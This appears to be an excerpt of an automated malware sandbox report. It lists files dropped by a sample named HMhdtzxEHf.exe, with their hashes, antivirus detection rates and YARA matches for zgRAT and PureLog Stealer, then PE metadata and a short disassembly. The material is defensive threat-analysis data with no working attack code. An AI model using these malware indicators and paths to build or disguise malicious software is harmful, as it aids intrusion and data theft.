                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):85504
                                                                                          Entropy (8bit):5.8769270258874755
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):70144
                                                                                          Entropy (8bit):5.909536568846014
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38400
                                                                                          Entropy (8bit):5.699005826018714
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36352
                                                                                          Entropy (8bit):5.668291349855899
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38400
                                                                                          Entropy (8bit):5.699005826018714
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126976
                                                                                          Entropy (8bit):6.057993947082715
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):32256
                                                                                          Entropy (8bit):5.631194486392901
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):64000
                                                                                          Entropy (8bit):5.857602289000348
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.629584586954759
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):33792
                                                                                          Entropy (8bit):5.541771649974822
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):38912
                                                                                          Entropy (8bit):5.679286635687991
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.660491370279985
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                          MD5:240E98D38E0B679F055470167D247022
                                                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):342528
                                                                                          Entropy (8bit):6.170134230759619
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):69632
                                                                                          Entropy (8bit):5.932541123129161
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):34816
                                                                                          Entropy (8bit):5.636032516496583
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36352
                                                                                          Entropy (8bit):5.668291349855899
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.629584586954759
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):41472
                                                                                          Entropy (8bit):5.6808219961645605
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):69632
                                                                                          Entropy (8bit):5.932541123129161
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (591), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):591
                                                                                          Entropy (8bit):5.8638878438741795
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:+mVPYh548IES/LwBML7vU9rneHvYhmbR1Uh6d5DRUSxE:+iQQ8IESDDuegKR/bFTxE
                                                                                          MD5:DBA91DD82585D2B7BCEDB739B8FA98C6
                                                                                          SHA1:84390215EE01A0D893D5DB56C0DD854A1870415C
                                                                                          SHA-256:6282EB7F07176E3E71862B30FB6FD36D4E6295A5D8E9AD5E5819604F59978004
                                                                                          SHA-512:08F4D9E7991D1FFF40F1B7BAEB392BB39BB774D77848B2A38A23186307294035134AC5B1D615EC581464DFD4B29E067267CFF1218815837B779F177350FA9A01
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Vss\Writers\Application\upfc.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Vss\Writers\Application\upfc.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):151
                                                                                          Entropy (8bit):4.796351130615274
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXE+MVXQvT55Vt5y6vpt0Rvj:Vx993DEUMM965r5yu0N
                                                                                          MD5:86F35609ED84FAC0C2DB82ECB48C1E37
                                                                                          SHA1:EC96101E0C2FB93CB39EF284008A4434A3F30254
                                                                                          SHA-256:8BC88C3F412ABC31CDD60B01FE5EC3522EA59DD607E5C8F143A68A42315303DD
                                                                                          SHA-512:B96E68A76DCAA619C3607E23FCA349C76978FC0B766E026C630D7106851AA3A5816D97065389797991955B14DAF25B8F6E8E937AA6D2B628636F0807C52F8307
                                                                                          Malicious:false
                                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 04/01/2025 06:51:20..06:51:20, error: 0x80072746.06:51:25, error: 0x80072746.
                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.781633807575831
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:HMhdtzxEHf.exe
                                                                                          File size:4'000'497 bytes
                                                                                          MD5:bc8116e0b506345bf1de248886a52f86
                                                                                          SHA1:21362fd44f8f157523e4c2616c0c66eb5ba05db0
                                                                                          SHA256:805bb6fbb8749ea5e5d1c0bc61216a96ad6a981d825e13220d34843f8936cd1d
                                                                                          SHA512:e0ffaef37600ecb2556acbad7f34d42b10c447ddcc6cbb25d72502345d6af8891bc070f976e3d47c31eb2070e3882863d49ad1eb1c4566b4ae05aac21ccdb387
                                                                                          SSDEEP:98304:6A0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8sH:t0GbMLx+kcimwRvosH
                                                                                          TLSH:D706F116A5924E32D274273545A7423D52A0EB363622FF0B3A5F51927C0BBF18E762F3
                                                                                          Icon Hash:f0f2aa29a9f2fc71
                                                                                          Entrypoint:0x41f530
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                          Instruction
                                                                                          call 00007FB1A0C756EBh
                                                                                          jmp 00007FB1A0C74FFDh
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          push dword ptr [ebp+08h]
                                                                                          mov esi, ecx
                                                                                          call 00007FB1A0C67E47h
                                                                                          mov dword ptr [esi], 004356D0h
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                          mov eax, ecx
                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                          mov dword ptr [ecx+04h], 004356D8h
                                                                                          mov dword ptr [ecx], 004356D0h
                                                                                          ret
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          mov esi, ecx
                                                                                          lea eax, dword ptr [esi+04h]
                                                                                          mov dword ptr [esi], 004356B8h
                                                                                          push eax
                                                                                          call 00007FB1A0C7848Fh
                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                          pop ecx
                                                                                          je 00007FB1A0C7518Ch
                                                                                          push 0000000Ch
                                                                                          push esi
                                                                                          call 00007FB1A0C74749h
                                                                                          pop ecx
                                                                                          pop ecx
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 0Ch
                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                          call 00007FB1A0C67DC2h
                                                                                          push 0043BEF0h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          push eax
                                                                                          call 00007FB1A0C77F49h
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 0Ch
                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                          call 00007FB1A0C75108h
                                                                                          push 0043C0F4h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          push eax
                                                                                          call 00007FB1A0C77F2Ch
                                                                                          int3
                                                                                          jmp 00007FB1A0C799C7h
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push 00422900h
                                                                                          push dword ptr fs:[00000000h]
                                                                                          Programming Language:
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x85d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6d000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
